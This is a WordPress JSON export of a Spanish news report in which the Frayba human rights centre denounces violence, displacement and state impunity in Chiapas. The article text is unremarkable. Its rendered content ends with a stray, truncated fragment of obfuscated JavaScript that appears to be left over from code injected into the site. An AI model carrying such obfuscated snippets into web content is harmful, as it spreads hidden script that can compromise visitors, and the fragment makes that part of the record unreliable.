{"id":14748,"date":"2024-03-20T02:04:01","date_gmt":"2024-03-20T02:04:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14748"},"modified":"2024-03-20T02:04:03","modified_gmt":"2024-03-20T02:04:03","slug":"preocupa-al-frayba-violaciones-a-los-derechos-humanos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14748","title":{"rendered":"Preocupa al Frayba violaciones a los derechos humanos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240319-WA0025-1024x576.jpg\" alt=\"\" class=\"wp-image-14749\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240319-WA0025-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240319-WA0025-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240319-WA0025-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240319-WA0025-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240319-WA0025.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>19 de Marzo del 2024. San Crist\u00f3bal de Las Casas.- En el marco del 35 aniversario del Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas (Frayba), se expres\u00f3 la preocupaci\u00f3n\u00a0 por el incremento de atentados contra la vida y el continuo atropello de los derechos fundamentales en Chiapas.<\/p>\n\n\n\n<p>En un comunicado, el Frayba destac\u00f3 su compromiso inquebrantable con la defensa de los m\u00e1s vulnerables y la b\u00fasqueda incansable de justicia y verdad en la regi\u00f3n.<\/p>\n\n\n\n<p>&#8220;El Frayba reitera su compromiso de acompa\u00f1amiento y construcci\u00f3n conjunta con los procesos organizativos locales, enfocados en la lucha por la justicia y la dignidad. Se denuncia la creciente violencia en Chiapas, donde la poblaci\u00f3n enfrenta desplazamientos forzados, desapariciones, ejecuciones extrajudiciales y otras formas de violencia sistem\u00e1tica&#8221;<\/p>\n\n\n\n<p>Asimismo, se\u00f1alaron al Estado mexicano por su negligencia en proteger los derechos humanos de la ciudadan\u00eda y de la poblaci\u00f3n migrante, as\u00ed como por su complicidad en las violaciones perpetradas por actores criminales. Adem\u00e1s, se critica la impunidad reinante, especialmente durante el per\u00edodo electoral, donde la continuidad de un sistema corrupto parece inminente.<\/p>\n\n\n\n<p>El Frayba record\u00f3 que la violencia en Chiapas no es un fen\u00f3meno nuevo, sino que ha persistido a lo largo de m\u00faltiples administraciones gubernamentales. &#8220;Se insta a la sociedad a mantenerse unida en la lucha por la justicia, la memoria colectiva y la construcci\u00f3n de la paz, en un contexto marcado por la resistencia de los pueblos originarios y la esperanza en un futuro m\u00e1s justo y humano&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 19 de Marzo del 2024. San Crist\u00f3bal de Las Casas.- En el marco del 35 aniversario del Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas (Frayba), se expres\u00f3 la preocupaci\u00f3n\u00a0 por el incremento de atentados contra la vida y el continuo atropello de los derechos fundamentales en Chiapas. En un comunicado, el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14749,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14748","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14748","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14748"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14748\/revisions"}],"predecessor-version":[{"id":14750,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14748\/revisions\/14750"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14749"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}